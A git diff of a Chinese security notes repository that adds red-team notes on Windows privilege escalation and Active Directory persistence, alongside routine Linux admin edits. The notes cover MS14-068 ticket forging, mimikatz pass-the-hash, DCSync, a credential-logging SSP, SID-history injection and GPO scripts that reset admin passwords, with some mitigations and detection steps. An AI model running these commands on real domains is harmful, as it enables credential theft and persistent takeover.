diff --git "a/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/\346\235\203\351\231\220\346\217\220\345\215\207.md" "b/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/\346\235\203\351\231\220\346\217\220\345\215\207.md"
index 92bef624..28c29c6c 100644
--- "a/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/\346\235\203\351\231\220\346\217\220\345\215\207.md"
+++ "b/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/\346\235\203\351\231\220\346\217\220\345\215\207.md"
@@ -159,10 +159,40 @@ i586-mingw32msvc-gcc useradd.c -o useradd.exe
- POC | Payload | exp
- [danigargu/CVE-2020-0796](https://github.com/danigargu/CVE-2020-0796) - Windows SMBv3 LPE Exploit
+**WerTrigger**
+- POC | Payload | exp
+ - [sailay1996/WerTrigger](https://github.com/sailay1996/WerTrigger)
+
+**CVE-2020-1066**
+- POC | Payload | exp
+ - [cbwang505/CVE-2020-1066-EXP](https://github.com/cbwang505/CVE-2020-1066-EXP)
+
---
## 域
+**Windows Access Token 令牌假冒**
+
+当用户注销后,系统将会使主令牌切换为模拟令牌,不会将令牌清除,只有在重启机器后才会清除。
+
+可以使用多种工具查看目前系统上存在的模拟令牌:
+- Incognito
+- Powershell - Invoke-TokenManipulation.ps1
+- Cobalt Strike - steal_token
+
+- MSF Moudle
+ ```
+ getsystem
+ load incognito meterpreter > list_tokens –u
+ impersonate_token "PAYLOADS\\Administrator”
+ ```
+
+**MS14-025**
+- 文章
+ - [Exploiting "Group Policy Preferences" AKA MS14-025 in windows environment to gain Admin user password.](https://github.com/incredibleindishell/Windows-AD-environment-related/blob/master/Exploiting-GPP-AKA-MS14_025-vulnerability/README.md)
+ - [Hack The Box - Active](https://www.jaiminton.com/HTB/Active/)
+ - [MS14-025: Vulnerability in Group Policy Preferences could allow elevation of privilege: May 13, 2014](https://support.microsoft.com/en-us/help/2962486/ms14-025-vulnerability-in-group-policy-preferences-could-allow-elevati)
+
**MS14-068 & CVE-2014-6324**
- 简介
@@ -184,6 +214,28 @@ i586-mingw32msvc-gcc useradd.c -o useradd.exe
- POC | Payload | exp
- [windows-kernel-exploits/MS14-068/](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068)
+ - [abatchy17/WindowsExploits/blob/master/MS14-068/MS14-068.exe](https://github.com/abatchy17/WindowsExploits/blob/master/MS14-068/MS14-068.exe)
+
+ 登录普通域用户 whoami/user 获取 sid
+
+ 退出域用户,登录本地用户
+ ```
+ ms14-068.exe -u 域成员名@域名 -s 域成员sid -d 域控制器地址 -p 域成员密码
+ MS14-068.exe -u test@test.org -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d 192.168.1.1 -p Admin123
+ ```
+ 接下来将导出生成一张 kerberos 票据,配合 mimikatz 的 ptt 功能,将票据导入到内存中
+
+ 使用 mimikatz 将票据注入到当前内存中,伪造凭证,如果成功则拥有域管理权限,可任意访问域中所有机器
+ ```bash
+ kerberos::purge // 清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造
+ kerberos::list // 查看当前机器凭证
+ kerberos::ptc 票据文件 // 将票据注入到内存中
+
+ 可以使用 net use \\域控名\C$ 尝试访问域控
+
+ 也能执行 psexec
+ PsExec64.exe -accepteula \\域控名 -s cmd /c "whoami /all"
+ ```
---
diff --git "a/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/\346\235\203\351\231\220\347\273\264\346\214\201.md" "b/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/\346\235\203\351\231\220\347\273\264\346\214\201.md"
index b1b9f0a1..7114b321 100644
--- "a/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/\346\235\203\351\231\220\347\273\264\346\214\201.md"
+++ "b/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/\346\235\203\351\231\220\347\273\264\346\214\201.md"
@@ -13,12 +13,14 @@
* **[web](#web)**
* [caidao](#caidao)
* [webshell](#webshell)
+ * [中间件](#中间件)
* **[win](#win)**
* [后门用户](#后门用户)
* [MSF权限维持](#MSF权限维持)
* [权限维持技巧](#权限维持技巧)
* [痕迹清理](#痕迹清理)
+ * [域](#域)
* **[linux](#linux)**
* [命令后台运行](#命令后台运行)
@@ -60,10 +62,10 @@
- [JoyChou93/webshell](https://github.com/JoyChou93/webshell) - 入侵分析时发现的 Webshell 后门
-- [LandGrey/webshell-detect-bypass](https://github.com/LandGrey/webshell-detect-bypass) - 绕过专业工具检测的 Webshell 研究文章和免杀的Webshell
-- [yzddmr6/webshell-venom](https://github.com/yzddmr6/webshell-venom) - 免杀webshell无限生成工具(利用随机异或无限免杀D盾)
+- [LandGrey/webshell-detect-bypass](https://github.com/LandGrey/webshell-detect-bypass) - 绕过专业工具检测的 Webshell 研究文章和免杀的 Webshell
+- [yzddmr6/webshell-venom](https://github.com/yzddmr6/webshell-venom) - 免杀 webshell 无限生成工具(利用随机异或无限免杀D盾)
- [tennc/webshell](https://github.com/tennc/webshell) - 一个 webshell 收集项目
-- [S9MF/S9MF-php-webshell-bypass](https://github.com/S9MF/S9MF-php-webshell-bypass) - 为方便WAF入库的项目 | 分享PHP免杀大马 | 菜是原罪 | 多姿势(假的就一个)
+- [S9MF/S9MF-php-webshell-bypass](https://github.com/S9MF/S9MF-php-webshell-bypass) - 分享 PHP 免杀大马
- [yzddmr6/as_webshell_venom](https://github.com/yzddmr6/as_webshell_venom) - 免杀 webshell 无限生成工具蚁剑版
- [backlion/webshell](https://github.com/backlion/webshell) - 这是一些常用的 webshell
- 一句话 ``
@@ -74,11 +76,15 @@
---
-## Module
+## 中间件
**httpd**
- 工具
- - [ianxtianxt/apache-](https://github.com/ianxtianxt/apache-) - apache权限维持后门
+ - [ianxtianxt/apache-](https://github.com/ianxtianxt/apache-) - apache 权限维持后门
+
+**nginx**
+- 工具
+ - [t57root/pwnginx](https://github.com/t57root/pwnginx)
---
@@ -293,6 +299,12 @@ reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v
attrib C:\Windows\System32\dllcache\sethc.exe +h +s
```
+**LGP 后门**
+
+开始->运行->键入"gpedit.msc"->本地组策略编辑器->window设置(system)->脚本->启动->属性
+
+![](../../../../assets/img/安全/笔记/RedTeam/权限维持/2.png)
+
---
## 痕迹清理
@@ -351,9 +363,201 @@ exit
---
-## 域控
+## 域
+
+**相关文章**
+- [我所了解的内网渗透——内网渗透知识大总结](https://www.anquanke.com/post/id/92646#h2-18)
+
+### AD持久化
+
+**DSRM密码同步**
+
+- 相关文章 : [巧用DSRM密码同步将域控权限持久化](http://drops.xmd5.com/static/drops/tips-9297.html)
+- 相关文章 : [DS Restore Mode Password Maintenance](https://docs.microsoft.com/zh-cn/archive/blogs/askds/ds-restore-mode-password-maintenance)
+- 相关文章 : [Sneaky Active Directory Persistence #11: Directory Service Restore Mode (DSRM)](https://adsecurity.org/?p=1714)
+- 相关文章 : [Sneaky Active Directory Persistence #13: DSRM Persistence v2](https://adsecurity.org/?p=1785)
+
+获取到域控权限后利用 DSRM 密码同步将域管权限持久化。
+
+Windows Server 2008 需要安装 [KB961320](https://support.microsoft.com/en-us/help/961320/a-feature-is-available-for-windows-server-2008-that-lets-you-synchroni) 补丁才支持 DSRM 密码同步,Windows Server 2003不支持 DSRM 密码同步。
+
+```
+ntdsutil
+set DSRM password
+SYNC FROM DOMAIN ACCOUNT krbtgt
+Q
+```
+
+修改注册表允许 DSRM 账户远程访问
+
+修改注册表 hkey_local_machineSystemCurrentControlSetControlLsa 路径下的 DSRMAdminLogonBehavior 的值为2。
+
+系统默认不存在 DSRMAdminLogonBehavior,需手动添加。
+
+此时可用 pth 登录
+```
+Mimikatz "privilege::debug" "sekurlsa::pth /domain:<域> /user:Administrator /ntlm:" exit
+```
+
+由于可以为 DSRM 帐户 PTH,因此可以使用 Mimikatz DCSync 利用此访问权限为任何域帐户提取密码数据。我们可以针对特定的域控制器,并使用 DC 的简称来强制执行 NTLM 身份验证。
+```
+Mimikatz "lsadump :: dcsync /domain:lab.adsecurity.org / dc:adsdc03 / user:krbtgt"
+```
+
+DSRM 账户是域控的本地管理员账户,并非域的管理员帐户。所以 DSRM 密码同步之后并不会影响域的管理员帐户。
+
+事件查看器的安全事件中筛选事件 ID 为 4794 的事件日志,来判断域管是否经常进行 DSRM 密码同步操作。
+
+- 缓解措施
+ - 确保每一台域控制器的 DSRM 账户密码是唯一的并且定期修改此密码。同时,确保注册表 DsrmAdminLogonBehavior 的值不为 2,最好将其直接删除或者设置其值为 1 或 0。
+
+**Security Support Provider**
+
+- 相关文章 : [Sneaky Active Directory Persistence #12: Malicious Security Support Provider (SSP)](https://adsecurity.org/?p=1760)
+
+1. 将 mimilib.dll 复制到域控 c:/windows/system32 下
+2. 更新注册表 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\Security Packages\ 添加 mimilib.dll
+3. 使用 mimikatz 用新的 SSP 在内存中打补丁 LSASS,不需要重启(重启可以清除 Mimikatz 注入的 memssp)。
+ ```
+ privilege::debug
+ misc::memssp
+ ```
+ mimikatz 包含的 SSP 提供自动记录本地验证凭证的功能。这包括计算机账户密码、运行服务凭证和任何登录的账户。默认情况下,这些数据会被记录在与 dll 文件相同的位置上,但也可以在系统的其他地方记录这些数据。如果 Windows 系统是一个提供认证用户访问权限的域控制器,那么备用的日志位置可以在 SYSVOL 中。
+4. c:/windows/system32 可看到新生成的文件 kiwissp.log,如果不是在域环境下生成的文件会在 system32/mimilsa.log
+
+- 缓解措施
+ - 检测注册表位置 HKEY_LOCAL_MACHINE/System/CurrentControlSet/Control/Lsa/Security Packages/
+
+**SID 历史**
+
+- 相关文章 : [Sneaky Active Directory Persistence #14: SID History](https://adsecurity.org/?p=1772)
+
+SID 历史记录是支持迁移方案的属性。每个用户帐户都有一个关联的安全标识符(SID),用于跟踪安全主体以及该帐户在连接到资源时所具有的访问权限。SID 历史记录使对另一个帐户的访问可以有效地克隆到另一个帐户。这对于确保用户从一个域移动(迁移)到另一个域时保留访问权限非常有用。由于在创建新帐户时用户的 SID 会更改,因此旧 SID 需要映射到新帐户。将域 A 中的用户迁移到域 B 时,将在域 B 中创建一个新的用户帐户,并将域 A 用户的 SID 添加到域 B 用户帐户的 SID 历史记录属性中。这样可以确保域 B 用户仍然可以访问域 A中的资源。
+
+有趣的是,SID 历史记录对同一域中的 SID 的作用和对同一林中的跨域的 SID 的作用一样,这意味着域 A 中的常规用户帐户可以包含域 A SID,如果域 A 的 SID 是特权账户或组,那么普通用户账户可以获得域 A 的管理权限,而不需要是域 Admins 的成员。
+
+注意:域中的普通用户可以在其 SID 历史记录中包含来自 Active Directory 目录林中的另一个域的 Enterprise Admin SID,从而将用户帐户的访问权限“提升”到目录林中所有域中的有效域管理员。
+
+如果您具有一个没有启用 SID 筛选的林信任关系(也称为隔离),则可以从另一个林中注入一个 SID,并且在进行身份验证并将其用于访问评估时,它将被添加到用户令牌中。
+
+Mimikatz 可以向任何用户账户注入 SID 历史记录(需要域管理员或同等权限)。
+
+在这种情况下,攻击者创建用户帐户“ bobafett”,并将域的默认管理员帐户“ ADSAdministrator”(RID 500)添加到帐户的 SID 历史记录属性。
+```
+mimikatz "privilege::debug" "misc::addsid bobafett ADSAdministrator"
+```
+
+> 注 : mimikatz 在 2016年5月6日移除了 misc::addsid,新增 sid:: module,可使用 sid::add 代替
+
+当 bobafett 账户登录时,所有与该账户相关联的 SIDs 都会被添加到用户的令牌中,用户的令牌用于确定资源的访问权限。与账户关联的 SID 是用户的 SID、用户所在的组 SID(包括这些组的成员)以及 SID 历史记录中包含的 SID。
+
+使用 PowerShell Active Directory cmdlet "Get-ADUser",我们可以看到没有分配给 bobafett 账户的组成员资格,尽管它在 SIDHistory(ADSAdministrator账户)中确实有一个 SID
+```powershell
+Import-Module ActiveDirectory
+get-aduser bobafett -properties sidhistory,memberof
+```
+
+当 bobafett 登录时,会评估与该账户相关的 SID,并根据这些 SID 确定访问权限。由于 bobafett 帐户与 ADSAdmnistrator 帐户(RID 500)相关联,因此 bobafett 帐户拥有 ADSAdministrator 帐户的所有访问权限,包括域管理权限。
+
+- 检测手段
+
+ 检测 SID 历史记录账户升级的最好方法是枚举出所有在 SID 历史属性中拥有数据的用户,并标记出包含同一域*中的SID的用户。如果用户没有被迁移,可以简单地搜索所有在 SIDHistory 属性中包含数据的用户。
+
+ PowerShell AD Cmdlet "Get-ADUser "对于检测 "同域SID历史记录 "最有用。
+ ```powershell
+ Import-Module ActiveDirectory
+ [string]$DomainSID = ( (Get-ADDomain).DomainSID.Value )
+
+ Get-ADUser -Filter "SIDHistory -Like '*'" -Properties SIDHistory | `
+ Where { $_.SIDHistory -Like "$DomainSID-*" }
+ ```
+ 注意,用户的 SIDHistory 中的 SID 以 "500 "结尾,该用户的 SID 是默认的域管理员账户,默认情况下是 Administrators、Domain Admins、Schema Admins 和 Enterprise Admins 的成员。
+
+**AdminSDHolder&SDProp**
+
+- 相关文章 : [Sneaky Active Directory Persistence #15: Leverage AdminSDHolder & SDProp to (Re)Gain Domain Admin Rights](https://adsecurity.org/?p=1906)
+
+---
+
+### 组策略
+
+**相关文章**
+- [BadGPO:组策略对象在持久化及横向渗透中的应用 ](https://www.anquanke.com/post/id/86531)
+- [Sneaky Active Directory Persistence #17: Group Policy](https://adsecurity.org/?p=2716)
+- [浅析域渗透中的组策略利用](https://xz.aliyun.com/t/7784)
+
+**组策略概述**
+
+组策略使管理员能够管理 Active Directory 中的计算机和用户。组策略保存为组策略对象(GPO)
+
+攻击者可以滥用 GPO,通过欺诈方式进一步自动化地传播恶意软件、实现持久化驻留目的,恶意软件可以利用 GPO 穿越 IDS/IPS 等防火墙,最终访问到域内所有的系统。
+
+GPO 的另一优点就是攻击过程期间并不需要目标系统在线,一旦离线状态下的目标系统重新登录到域中,恶意的 GPO 载荷就会被投递到目标系统。
+
+组策略可以包括安全选项,注册表项,软件安装以及用于启动和关闭的脚本,并且域成员默认情况下每 90 分钟刷新一次组策略设置(对于域控制器为 5 分钟)。 这意味着组策略在目标计算机上强制执行配置的设置。
+
+在大多数 Active Directory 实现中,在域上至少配置了一个 GPO,定义了授权密码、Kerberos 和全域策略;至少有一个为域控制器 OU 配置的 GPO;至少有一个为服务器和工作站 OU 配置的 GPO。这些 GPO 定义了特定于环境的安全设置,并通常配置管理组,包括启动/关闭脚本等。GPO 可以被配置为在每个级别上设置组织定义的安全要求,并可用于安装软件和设置文件和注册表权限。
+
+GPO 仅适用于用户和计算机,并且可以按组进行过滤,或者可以使用“首选项”组件进行更具体的定位。 “No Override”选项可确保即使更接近资源的 GPO 设置相互矛盾,也可以应用组策略中的设置。
+
+SYSVOL 是所有经过身份验证的用户具有读取权限的 Active Directory 中的域范围共享。SYSVOL 包含登录脚本,组策略数据以及其他域控制器中需要使用的全域数据。
+
+SYSVOL 共享将自动同步并在所有域控制器之间共享。
+
+组策略也相当于远控,可以配置脚本让域内的每一台电脑都种上马批量执行一遍。
+
+- 计划任务案例
+
+ **修改密码**
+
+ changepass.vbs
+ ```
+ strComputer = "."
+ Set objUser = GetObject("WinNT://" & strComputer & "/Administrator, user")
+ objUser.SetPassword "Zaq1xsw2"
+ objUser.SetInfo
+ ```
+ 这个脚本的作用是修改本地管理员账户的密码为 Zaq1xsw2
+
+ 在域策略的 GPO 下面下发这个脚本
+ ![](../../../../assets/img/安全/笔记/RedTeam/权限维持/3.png)
+
+ 在域内主机上面登录域普通用户,强制刷新组策略 `gpupdate /force`,查看 vbs 脚本
+
+ ![](../../../../assets/img/安全/笔记/RedTeam/权限维持/4.png)
+
+ ---
+
+ **按照时间定时的收集信息**
+
+ 导入 powershell 中管理 GPO 的模块,创建一个作用整个域的 GPO
+ ```
+ Import-Module GroupPolicy –verbose
+ new-gpo -name TestGPO | new-gplink -Target "dc=test1,dc=local"
+ ```
+
+ 执行脚本添加计划任务
+ ```
+ New-GPOImmediateTask -TaskName Debugging -GPODisplayName TestGPO -SysPath '\\dc\sysvol\test1.local' -CommandArguments '-c "123 | Out-File C:\test\debug.txt"'
+ ```
+
+ 强制更新组策略,或者默认等待90分钟组策略强制更新
+ ```
+ Invoke-GPUpdate -Computer "TEST\COMPUTER-01"
+ ```
+
+ 清理痕迹
+ ```
+ Remove-GPO -Name TestGPO
+ ```
+
+---
+
+### Hook PasswordChangeNotify
-![](../../../../assets/img/才怪.png)
+**相关文章**
+- [域渗透——Hook PasswordChangeNotify](http://drops.xmd5.com/static/drops/tips-13079.html)
+- [维持域管权限的一些简单办法[Hook PasswordChangeNotify]](https://klionsec.github.io/2016/08/16/Hook-PasswordChangeNotify/)
---
diff --git "a/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/\350\275\257\344\273\266\346\234\215\345\212\241\345\256\211\345\205\250.md" "b/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/\350\275\257\344\273\266\346\234\215\345\212\241\345\256\211\345\205\250.md"
index 7f5d38e4..66fedcbf 100644
--- "a/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/\350\275\257\344\273\266\346\234\215\345\212\241\345\256\211\345\205\250.md"
+++ "b/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/\350\275\257\344\273\266\346\234\215\345\212\241\345\256\211\345\205\250.md"
@@ -783,14 +783,6 @@ exploit
./zkCli.sh -server :port
```
- ```bash
- # 获得所有节点
- kubectl -s http://1.2.3.4:8080/ get nodes
- # 获得所有容器
- kubectl -s http://1.2.3.4:8080/ get pods --all-namespaces=true
- # 在 myapp 容器获得一个交互式 shell
- kubectl -s http://1.2.3.4:8080/ --namespace=default exec -it myapp bash
- ```
**CVE-2014-0085 ZooKeeper 信息泄露漏洞**
- 简介
diff --git "a/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/\351\200\273\350\276\221\347\261\273\346\274\217\346\264\236.md" "b/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/\351\200\273\350\276\221\347\261\273\346\274\217\346\264\236.md"
index 07f3fbbc..f404ad92 100644
--- "a/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/\351\200\273\350\276\221\347\261\273\346\274\217\346\264\236.md"
+++ "b/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/RedTeam/\351\200\273\350\276\221\347\261\273\346\274\217\346\264\236.md"
@@ -385,4 +385,5 @@ X-Forwarded-Host: 127.0.0.1
# Ticket_Trick
**文章**
+- [How I hacked hundreds of companies through their helpdesk](https://medium.com/intigriti/how-i-hacked-hundreds-of-companies-through-their-helpdesk-b7680ddc2d4c)
- [How I hacked Google’s bug tracking system itself for $15,600 in bounties](https://medium.com/@alex.birsan/messing-with-the-google-buganizer-system-for-15-600-in-bounties-58f86cc9f9a5)
diff --git "a/1earn/\345\274\200\345\217\221/\347\211\210\346\234\254\346\216\247\345\210\266/Git\345\255\246\344\271\240\347\254\224\350\256\260.md" "b/1earn/\345\274\200\345\217\221/\347\211\210\346\234\254\346\216\247\345\210\266/Git\345\255\246\344\271\240\347\254\224\350\256\260.md"
index 7b028c20..02983594 100644
--- "a/1earn/\345\274\200\345\217\221/\347\211\210\346\234\254\346\216\247\345\210\266/Git\345\255\246\344\271\240\347\254\224\350\256\260.md"
+++ "b/1earn/\345\274\200\345\217\221/\347\211\210\346\234\254\346\216\247\345\210\266/Git\345\255\246\344\271\240\347\254\224\350\256\260.md"
@@ -395,7 +395,7 @@ git push --force origin
## github
-
+
- **github 开启二次验证后后,git push 验证权限失败**
diff --git "a/1earn/\350\277\220\347\273\264/Linux/God-Linux.md" "b/1earn/\350\277\220\347\273\264/Linux/God-Linux.md"
index 5df12386..c2dcb785 100644
--- "a/1earn/\350\277\220\347\273\264/Linux/God-Linux.md"
+++ "b/1earn/\350\277\220\347\273\264/Linux/God-Linux.md"
@@ -10,7 +10,7 @@
```
-
+
diff --git "a/1earn/\350\277\220\347\273\264/Linux/Power-Linux.md" "b/1earn/\350\277\220\347\273\264/Linux/Power-Linux.md"
index d9649ad9..faa25319 100644
--- "a/1earn/\350\277\220\347\273\264/Linux/Power-Linux.md"
+++ "b/1earn/\350\277\220\347\273\264/Linux/Power-Linux.md"
@@ -10,7 +10,7 @@
```
-
+
@@ -366,7 +366,7 @@ vimdiff FILE_LEFT FILE_RIGHT
```bash
mkdir -p /opt/adguard && cd /opt/adguard
wget https://github.com/AdguardTeam/AdGuardHome/releases/download/v0.95-hotfix/AdGuardHome_v0.95-hotfix_linux_amd64.tar.gz
-tar -xzvf AdGuardHome_v0.94_linux_amd64.tar.gz
+tar -xzvf AdGuardHome_v0.95-hotfix_linux_amd64.tar.gz
cd AdGuardHome
./AdGuardHome -s install
@@ -1346,7 +1346,7 @@ pdnsutil list-zone test-zone-1
### PowerDNS-Admin
-> PowerDNS-Admin是一个具有以下高级功能的PowerDNS Web界面
+> PowerDNS-Admin 是一个具有以下高级功能的 PowerDNS Web 界面
**项目地址**
- https://github.com/ngoduykhanh/PowerDNS-Admin
@@ -1648,7 +1648,7 @@ echo "PasswordAuthentication yes" >> /etc/ssh/sshd_config
## ttyd
-`在 web 上访问终端`
+> 用于在 web 上访问终端
**项目地址**
- https://github.com/tsl0922/ttyd
@@ -1671,7 +1671,7 @@ ttyd -p 8080 bash -x # 现在访问 http://localhost:8080 即可
## vnc4server
-`VNC 服务`
+> 为主机提供 VNC 服务
**安装**
```bash
@@ -1904,25 +1904,30 @@ echo -e "xxx.com {
首先下载 NodeJS 的二进制文件,http://nodejs.org/download/ .在 Linux Binaries (.tar.gz) 行处根据自己系统的位数选择
```bash
# 解压到当前文件夹下运行
-tar zxvf node-v0.10.26-linux-x64.tar.gz
+tar xvJf node-v12.17.0-linux-x64.tar
进入解压后的目录 bin 目录下,执行 ls 会看到两个文件 node,npm. 然后执行 ./node -v ,如果显示出 版本号说明我们下载的程序包是没有问题的.依次运行如下三条命令
-cd node-v0.10.26-linux-x64/bin
+cd node-v12.17.0-linux-x64/bin
ls
./node -v
```
-因为 /home/kun/mysofltware/node-v0.10.26-linux-x64/bin 这个目录是不在环境变量中的,所以只能到该目录下才能 node 的程序.如果在其他的目录下执行 node 命令的话 ,必须通过绝对路径访问才可以的
+因为 /home/node-v12.17.0-linux-x64/bin 这个目录是不在环境变量中的,所以只能到该目录下才能 node 的程序.如果在其他的目录下执行 node 命令的话 ,必须通过绝对路径访问才可以的
如果要在任意目录可以访问的话,需要将 node 所在的目录,添加 PATH 环境变量里面,或者通过软连接的形式将 node 和 npm 链接到系统默认的 PATH 目录下的一个
在终端执行 echo $PATH 可以获取 PATH 变量包含的内容,系统默认的 PATH 环境变量包括 /usr/local/bin:/usr/bin:/bin:/usr/local/sbin:/usr/sbin:/sbin: ,冒号为分隔符.所以我们可以将 node 和 npm 链接到 /usr/local/bin 目录下如下执行
```bash
-ln -s /home/kun/mysofltware/node-v0.10.26-linux-x64/bin/node /usr/local/bin/node
-ln -s /home/kun/mysofltware/node-v0.10.26-linux-x64/bin/npm /usr/local/bin/npm
+ln -s /home/node-v12.17.0-linux-x64/bin/node /usr/local/bin/node
+ln -s /home/node-v12.17.0-linux-x64/bin/npm /usr/local/bin/npm
```
**加速**
- [node&js](../../Plan/Misc-Plan.md#node&js)
+**强制安装**
+```bash
+npm install --unsafe-perm=true --allow-root
+```
+
**forever**
> forever 是一个简单的命令式 nodejs 的守护进程,能够启动,停止,重启 App 应用。forever 完全基于命令行操作,在forever进程之下,创建 node 的子进程,通过 monitor 监控 node 子进程的运行情况,一旦文件更新或进程挂掉,forever 会自动重启 node 服务器,确保应用正常运行。
@@ -2121,7 +2126,7 @@ systemctl restart nginx
## RabbitMQ
-RabbitMQ 是流行的开源消息队列系统,是 AMQP(Advanced Message Queuing Protocol 高级消息队列协议)的标准实现,用 erlang 语言开发.RabbitMQ 据说具有良好的性能和时效性,同时还能够非常好的支持集群和负载部署,非常适合在较大规模的分布式系统中使用.
+> RabbitMQ 是流行的开源消息队列系统,是 AMQP(Advanced Message Queuing Protocol 高级消息队列协议)的标准实现,用 erlang 语言开发.RabbitMQ 据说具有良好的性能和时效性,同时还能够非常好的支持集群和负载部署,非常适合在较大规模的分布式系统中使用.
**官网**
- https://www.rabbitmq.com/
@@ -2303,7 +2308,7 @@ sudo service uwsgi restart
现在访问 www.你的域名.com 查看你的搜索引擎服务把~
-**tips**
+**Tips**
搜索引擎设置在 settings_et_dev.yml 文件中
diff --git "a/1earn/\350\277\220\347\273\264/Linux/Secure-Linux.md" "b/1earn/\350\277\220\347\273\264/Linux/Secure-Linux.md"
index 712021c1..8e1a720a 100644
--- "a/1earn/\350\277\220\347\273\264/Linux/Secure-Linux.md"
+++ "b/1earn/\350\277\220\347\273\264/Linux/Secure-Linux.md"
@@ -10,7 +10,7 @@
```
-
+
diff --git "a/1earn/\350\277\220\347\273\264/Linux/Speed-Linux.md" "b/1earn/\350\277\220\347\273\264/Linux/Speed-Linux.md"
index 46f12f2a..22f26e26 100644
--- "a/1earn/\350\277\220\347\273\264/Linux/Speed-Linux.md"
+++ "b/1earn/\350\277\220\347\273\264/Linux/Speed-Linux.md"
@@ -10,7 +10,7 @@
```
-
+
@@ -28,7 +28,7 @@
* [环境变量](#环境变量)
* [符号](#符号)
* [会话](#会话)
- * [文件](#文件)
+ * [文件和目录](#文件和目录)
* [查看](#查看)
* [创建](#创建)
* [删除](#删除)
@@ -58,12 +58,13 @@
* [常用软件](#常用软件)
* **[🦋 系统管理](#系统管理)**
+ * [系统信息](#系统信息)
+ * [日志](#日志)
* [系统设置](#系统设置)
* [时间](#时间)
* [语言](#语言)
* [启动项-计划任务](#启动项-计划任务)
* [SELinux](#SELinux)
- * [系统信息](#系统信息)
* [账号管控](#账号管控)
* [进程管理](#进程管理)
* [设备管理](#设备管理)
@@ -255,7 +256,7 @@ cd # 切换工作目录
root # 超级用户目录,存放 root 用户相关文件
home # 存放普通用户相关文件
bin # (binaries)存放二进制可执行文件
- sbin # (super user binaries)存放二进制可执行文件,只有root才能访问
+ sbin # (super user binaries)存放二进制可执行文件,只有 root 才能访问
mnt # (mount)系统管理员安装临时文件系统的安装点
etc # (etcetera)存放系统配置文件
var # (variable)用于存放运行时需要改变数据的文件
@@ -460,12 +461,26 @@ gedit # 图形化的编辑器
```bash
diff <变动前的文件> <变动后的文件>
-
+```
+```bash
vimdiff <变动前的文件> <变动后的文件>
```
### 链接
+**inode**
+
+inode 是指在许多“类 Unix 文件系统”中的一种数据结构。每个 inode 保存了文件系统中的一个文件系统对象(包括文件、目录、设备文件、socket、管道, 等等)的元信息数据,但不包括数据内容或者文件名。
+
+文件系统中每个“文件系统对象”对应一个“inode”数据,并用一个整数值来辨识。这个整数常被称为 inode 号码(“i-number”或“inode number”)。由于文件系统的 inode 表的存储位置、总条目数量都是固定的,因此可以用 inode 号码去索引查找 inode 表。
+
+简而言之
+- inode 存储的是文件的元数据
+- inode 是文件在磁盘上的索引编号
+- inode 是文件的唯一标示符(主键), 而非文件名
+
+Linux 系统中,显示文件的 inode 使用 `ls -i`,使用 `df -i` 可以显示当前挂载列表中 inode 使用情况
+
**软连接**
符号链接文件保存着源文件所在的绝对路径,在读取时会定位到源文件上,可以理解为 Windows 的快捷方式。
@@ -504,19 +519,6 @@ ln file1 file2
- 不允许给目录创建硬链接(注意是不能通过 ln 的方式)
- 只有在同一文件系统才能创建硬链接
-**inode**
-
-inode 是指在许多“类 Unix 文件系统”中的一种数据结构。每个 inode 保存了文件系统中的一个文件系统对象(包括文件、目录、设备文件、socket、管道, 等等)的元信息数据,但不包括数据内容或者文件名。
-
-文件系统中每个“文件系统对象”对应一个“inode”数据,并用一个整数值来辨识。这个整数常被称为 inode 号码(“i-number”或“inode number”)。由于文件系统的 inode 表的存储位置、总条目数量都是固定的,因此可以用 inode 号码去索引查找 inode 表。
-
-简而言之
-- inode 存储的是文件的元数据
-- inode 是文件在磁盘上的索引编号
-- inode 是文件的唯一标示符(主键), 而非文件名
-
-Linux 系统中,显示文件的 inode 使用 `ls -i`,使用 `df -i` 可以显示当前挂载列表中 inode 使用情况
-
### 压缩备份
```bash
@@ -532,6 +534,9 @@ tar -rvf test.tar.bz2 test2 # 追加一个内容
tar -zxvf FileName.tar.gz # 解压
tar -zcvf FileName.tar.gz DirName # 压缩
+.tar.xz
+tar -xvJf FileName.tar.xz # 解压
+
.tar.Z
tar -Zxvf FileName.tar.Z # 解压
tar -Zcvf FileName.tar.Z DirName # 压缩
@@ -583,14 +588,14 @@ ar -p FileName.deb data.tar.gz | tar zxf - # 解包
## 查看网络信息
**主机名**
-```
-hostname
+```bash
+hostname # 查看本机的hostname
```
**IP 地址**
```bash
-ifconfig # ifconfig 命令已经被弃用,不应该使用
-ip a # 显示网络设备的运行状态
+ifconfig # ifconfig 命令已经被弃用,不应该使用
+ip a # 显示网络设备的运行状态
hostname -I
netstat -a
cat /proc/net/fib_trie
@@ -600,9 +605,9 @@ sudo -v
**端口**
```bash
-getent services # 查看所有服务的默认端口名称和端口号
-ss -tnlp
-lsof -i
+getent services # 查看所有服务的默认端口名称和端口号
+ss -tnlp # 获取 socket 统计信息
+lsof -i # 列出当前系统打开文件
netstat -antup
netstat -antpx
netstat -tulpn
@@ -610,128 +615,123 @@ netstat -tulpn
**路由表**
```bash
-route
-ip route # 显示核心路由表
-ip neigh # 显示邻居表
+route # 查看路由表
+ip route # 显示核心路由表
+ip neigh # 显示邻居表
```
**DNS**
```bash
-cat /etc/resolv.conf
+cat /etc/resolv.conf # 查看 DNS 解析配置文件
```
**arp 条目**
```bash
-arp -e
